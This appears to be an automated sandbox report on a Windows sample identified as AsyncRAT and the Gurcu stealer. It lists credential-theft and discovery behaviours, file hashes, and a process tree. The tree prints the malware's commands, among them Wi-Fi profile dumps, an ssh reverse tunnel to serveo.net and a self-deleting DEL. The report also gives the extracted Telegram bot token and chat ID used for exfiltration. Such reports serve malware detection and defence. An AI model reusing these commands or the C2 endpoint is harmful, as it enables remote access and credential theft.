Overview

overview

10

Static

static

10

jason test.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    30s
  • max time network
    31s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    16-08-2024 13:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    jason test.exe

  • Size

    529KB

  • MD5

    56acec58d46d6f079c16209f4347360a

  • SHA1

    a7587f272a6afc0751ead66478d9a00742ce007e

  • SHA256

    0ebe58286c1f137fa8502c2b9e6f0e60b451409a3caac4125ef0ea10c931024d

  • SHA512

    724b8f625045c27fb6df5a29dda9ff889865349661c6d810b858b97f4ef33ff6a5bee30f5c61d73a304694589c937450dae7d98275fe1642001bb42b79050216

  • SSDEEP

    6144:qbioob8+F2a9boZguBQNYPj2jBoO33tq6qbXaYBc1g5aN9KBBBBBBByygHG/bZ+V:Nd8xZguBiYPAq81g5aN+BVKD

Score
10/10
asyncratgurcucollectioncredential_accessdiscoverypersistenceprivilege_escalationratspywarestealer

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7375395402:AAEj5wSTewdwdI2lrdXYvNdlkLxj5pTH9pg/sendMessage?chat_id=6725988743

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

    stealergurcu
  • Async RAT payload 1 IoCs
    rat
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Executes dropped EXE 2 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Modifies registry class 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 62 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 25 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\jason test.exe
    "C:\Users\Admin\AppData\Local\Temp\jason test.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:492
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C wmic path win32_ComputerSystem get model
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:968
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic path win32_ComputerSystem get model
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4364
    • C:\Users\Admin\AppData\Local\Temp\nZLDYKrFaM\build.exe
      "C:\Users\Admin\AppData\Local\Temp\nZLDYKrFaM\build.exe"
      2⤵
      • Executes dropped EXE
      • Accesses Microsoft Outlook profiles
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      • outlook_office_path
      • outlook_win_path
      PID:4732
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
        3⤵
        • System Network Configuration Discovery: Wi-Fi Discovery
        • Suspicious use of WriteProcessMemory
        PID:3216
        • C:\Windows\system32\chcp.com
          chcp 65001
          4⤵
            PID:3820
          • C:\Windows\system32\netsh.exe
            netsh wlan show profiles
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:2732
          • C:\Windows\system32\findstr.exe
            findstr /R /C:"[ ]:[ ]"
            4⤵
              PID:2120
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:72
            • C:\Windows\system32\chcp.com
              chcp 65001
              4⤵
                PID:1952
              • C:\Windows\system32\netsh.exe
                netsh wlan show networks mode=bssid
                4⤵
                • Event Triggered Execution: Netsh Helper DLL
                PID:3036
              • C:\Windows\system32\findstr.exe
                findstr "SSID BSSID Signal"
                4⤵
                  PID:4760
              • C:\Windows\System32\OpenSSH\ssh.exe
                "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:3724 serveo.net
                3⤵
                  PID:3192
              • C:\Users\Admin\AppData\Local\Temp\cRWlRBoVEkJF\Latypuh_LetThereBeCarnage.exe
                "C:\Users\Admin\AppData\Local\Temp\cRWlRBoVEkJF\Latypuh_LetThereBeCarnage.exe"
                2⤵
                • Executes dropped EXE
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                PID:448
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C TIMEOUT /T 3 && DEL /f "C:\Users\Admin\AppData\Local\Temp\jason test.exe"
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2864
                • C:\Windows\system32\timeout.exe
                  TIMEOUT /T 3
                  3⤵
                  • Delays execution with timeout.exe
                  PID:2804
            • C:\Windows\System32\Taskmgr.exe
              "C:\Windows\System32\Taskmgr.exe"
              1⤵
              • Checks SCSI registry key(s)
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:4728

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\cRWlRBoVEkJF\Latypuh_LetThereBeCarnage.exe
              Filesize

              405KB

              MD5

              9bed44cbd66a6ac9ba58bd121cc31120

              SHA1

              ec7479fcf0b9574bbcd155cba27bcd3b73d2a80d

              SHA256

              488e8ae508c7fab6587ec3e5640e9edb61c397667dc5e799322bb76d8ffc3a02

              SHA512

              f639c53e6b24f7afb0a24172f4ea7f5a453d5d123ea35340533ad3476efb8cb7b510cf22eb75bb47f06e830b0fa9250ee10df7cab93a4f37bd676b1ada3678b8

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\nZLDYKrFaM\build.exe
              Filesize

              115KB

              MD5

              6cba0a7c6d100f3e95efbeb4c14880ce

              SHA1

              11b39ee1e96aba2a001f5a74ff4dcf2749e6bdbe

              SHA256

              8eb6369c9fa16e155ca29cedff0fd812ccb1d0ba9c0a3af912744a2e7e7167c3

              SHA512

              e3e57ce5dacd83677d4b0c5824adb130123708c2ecc06d7d3e9e8be99ac00a542451b932f631e67dcfa2f8805369da5b95883c62f50b88dcd2471ed6432ca3f8

              Download Submit

            • memory/448-26-0x0000000000490000-0x00000000004FC000-memory.dmp

              Filesize

              432KB

              Download

            • memory/492-0-0x00007FFFB7B33000-0x00007FFFB7B35000-memory.dmp

              Filesize

              8KB

              Download

            • memory/492-1-0x0000000000110000-0x000000000019A000-memory.dmp

              Filesize

              552KB

              Download

            • memory/4728-42-0x000001E0F6AC0000-0x000001E0F6AC1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/4728-44-0x000001E0F6AC0000-0x000001E0F6AC1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/4728-43-0x000001E0F6AC0000-0x000001E0F6AC1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/4728-48-0x000001E0F6AC0000-0x000001E0F6AC1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/4728-54-0x000001E0F6AC0000-0x000001E0F6AC1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/4728-53-0x000001E0F6AC0000-0x000001E0F6AC1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/4728-52-0x000001E0F6AC0000-0x000001E0F6AC1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/4728-51-0x000001E0F6AC0000-0x000001E0F6AC1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/4728-50-0x000001E0F6AC0000-0x000001E0F6AC1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/4728-49-0x000001E0F6AC0000-0x000001E0F6AC1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/4732-27-0x000002D6E3570000-0x000002D6E3592000-memory.dmp

              Filesize

              136KB

              Download